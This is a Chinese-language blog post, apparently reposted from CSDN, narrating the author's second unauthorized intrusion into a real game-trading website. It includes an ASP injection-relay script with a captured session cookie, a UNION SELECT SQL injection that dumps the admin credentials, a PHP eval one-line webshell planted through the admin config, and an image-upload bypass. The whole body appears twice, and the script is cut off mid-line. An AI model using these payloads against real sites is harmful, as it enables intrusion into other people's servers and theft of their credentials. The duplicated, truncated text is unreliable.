入侵某一游戲交易網
發(fā)布日期:2021-12-31 14:15 | 文章來源:CSDN
在這次入侵之前我已經拿到過一次這個網站的shell了,但是被刪除了,由于不甘心又拿了一次,才有了下面的過程
一: 踩點 收集信息
因為這個已經是第二次入侵,所以具體的信息我已經基本上掌握
服務器上13個站點,大多數(shù)站點很安全,因為第一滲透的時候,是由
http://www.shanXXX.XX 這個站進入的
我這個人比較戀舊,所以第二次也決定由這個站點進行入侵,
由后臺看出這個站的程序是RAICO_V1[1].2_CS 如圖1
直接從網上down下來,讀代碼,當然這里的php代碼 本人是非常的菜鳥,感謝我的好友jackal,他的腳本是相當?shù)膹姾?呵呵
二: 漏洞在哪里?它在燈火闌珊處
這個程序的漏洞文件是在post_task_review.php
由于過濾不嚴格導致注入,下面我會在文章中詳細說明如何利用,
首先在shan這個站注冊個用戶 并抓取登陸的cookie值,在到本地或者webshell上建立一個注入中轉站的文件
內容如下
http://www.shanXXX.XX/post_task_review.php"
JmRef="http://www.shanXXX.XX/post_task.php"
JmCok="__utma=213560918.3117244849183171600.1213283730.1213293786.1213305387.4; __utmz=213560918.1213283730.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmb=213560918.21.10.1213305387; __utmc=213560918; PHPSESSID=96b20d4edfe8477cf276aa639bfc31d3"
JmStr=URLEncoding(JmStr)
response.write PostData(JMUrl,JmStr,JmCok,JmRef)
Function PostData(PostUrl,PostStr,PostCok,PostRef)
Dim Http
Set Http = Server.CreateObject("msxml2.serverXMLHTTP")
With Http
.Open "POST",PostUrl,False
.SetRequestHeader "Content-Length",Len(PostStr)
.SetRequestHeader "Content-Type","application/x-www-form-urlencoded"
.SetRequestHeader "Referer",PostRef
.SetRequestHeader "Cookie",PostCok
.Send PostStr
PostData = .ResponseBody
End With
Set Http = Nothing
PostData =bytes2BSTR(PostData)
End Function
Function bytes2BSTR(vIn)
Dim strReturn
Dim I, ThisCharCode, NextCharCode
strReturn = ""
For I = 1 To LenB(vIn)
ThisCharCode = AscB(MidB(vIn, I, 1))
If ThisCharCode
之后瀏覽地址為http://localhost/jmpost.asp?id=1107 and 1=2 union select -1,concat(admin_name,admin_pw) from rco_admin/* 就可以直接爆出管理員的用戶名和密碼 如圖2
三: 獲取webshell 拿到目標站的路徑.
登陸后臺
,只能上傳圖片,抓包上傳,截斷 ,未能實現(xiàn).
但是后臺的配置那可以插一句話
a'";@eval($_POST[cmd]);//
寫進去本來是site="a\'\";@eval"
但是過濾了'
就成了site="a\\";@eval;//"
這樣成功的閉合了前面的雙引,把后面的雙引注釋掉了.中間的;@eval($_POST[cmd]);就可以執(zhí)行了.
把a'";@eval($_POST[cmd]);// 寫進去就保存到一個文件里了.
這個文件被所有的文件包含.
所以我們直接同一句話連接端連接網站的任何一個文件都可以獲得webshell. 如圖
直接傳php沒傳上去,所以把php馬改成jpg格式的,之后在一句話連接端中修改成php的
順利拿到webshell如圖,
一: 踩點 收集信息
因為這個已經是第二次入侵,所以具體的信息我已經基本上掌握
服務器上13個站點,大多數(shù)站點很安全,因為第一滲透的時候,是由
http://www.shanXXX.XX 這個站進入的
我這個人比較戀舊,所以第二次也決定由這個站點進行入侵,
由后臺看出這個站的程序是RAICO_V1[1].2_CS 如圖1
直接從網上down下來,讀代碼,當然這里的php代碼 本人是非常的菜鳥,感謝我的好友jackal,他的腳本是相當?shù)膹姾?呵呵
二: 漏洞在哪里?它在燈火闌珊處
這個程序的漏洞文件是在post_task_review.php
由于過濾不嚴格導致注入,下面我會在文章中詳細說明如何利用,
首先在shan這個站注冊個用戶 并抓取登陸的cookie值,在到本地或者webshell上建立一個注入中轉站的文件
內容如下
http://www.shanXXX.XX/post_task_review.php"
JmRef="http://www.shanXXX.XX/post_task.php"
JmCok="__utma=213560918.3117244849183171600.1213283730.1213293786.1213305387.4; __utmz=213560918.1213283730.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmb=213560918.21.10.1213305387; __utmc=213560918; PHPSESSID=96b20d4edfe8477cf276aa639bfc31d3"
JmStr=URLEncoding(JmStr)
response.write PostData(JMUrl,JmStr,JmCok,JmRef)
Function PostData(PostUrl,PostStr,PostCok,PostRef)
Dim Http
Set Http = Server.CreateObject("msxml2.serverXMLHTTP")
With Http
.Open "POST",PostUrl,False
.SetRequestHeader "Content-Length",Len(PostStr)
.SetRequestHeader "Content-Type","application/x-www-form-urlencoded"
.SetRequestHeader "Referer",PostRef
.SetRequestHeader "Cookie",PostCok
.Send PostStr
PostData = .ResponseBody
End With
Set Http = Nothing
PostData =bytes2BSTR(PostData)
End Function
Function bytes2BSTR(vIn)
Dim strReturn
Dim I, ThisCharCode, NextCharCode
strReturn = ""
For I = 1 To LenB(vIn)
ThisCharCode = AscB(MidB(vIn, I, 1))
If ThisCharCode
之后瀏覽地址為http://localhost/jmpost.asp?id=1107 and 1=2 union select -1,concat(admin_name,admin_pw) from rco_admin/* 就可以直接爆出管理員的用戶名和密碼 如圖2
三: 獲取webshell 拿到目標站的路徑.
登陸后臺
,只能上傳圖片,抓包上傳,截斷 ,未能實現(xiàn).
但是后臺的配置那可以插一句話
a'";@eval($_POST[cmd]);//
寫進去本來是site="a\'\";@eval"
但是過濾了'
就成了site="a\\";@eval;//"
這樣成功的閉合了前面的雙引,把后面的雙引注釋掉了.中間的;@eval($_POST[cmd]);就可以執(zhí)行了.
把a'";@eval($_POST[cmd]);// 寫進去就保存到一個文件里了.
這個文件被所有的文件包含.
所以我們直接同一句話連接端連接網站的任何一個文件都可以獲得webshell. 如圖
直接傳php沒傳上去,所以把php馬改成jpg格式的,之后在一句話連接端中修改成php的
順利拿到webshell如圖,
上一頁12 下一頁 閱讀全文
版權聲明:本站文章來源標注為YINGSOO的內容版權均為本站所有,歡迎引用、轉載,請保持原文完整并注明來源及原文鏈接。禁止復制或仿造本網站,禁止在非maisonbaluchon.cn所屬的服務器上建立鏡像,否則將依法追究法律責任。本站部分內容來源于網友推薦、互聯(lián)網收集整理而來,僅供學習參考,不代表本站立場,如有內容涉嫌侵權,請聯(lián)系alex-e#qq.com處理。
相關文章
關注官方微信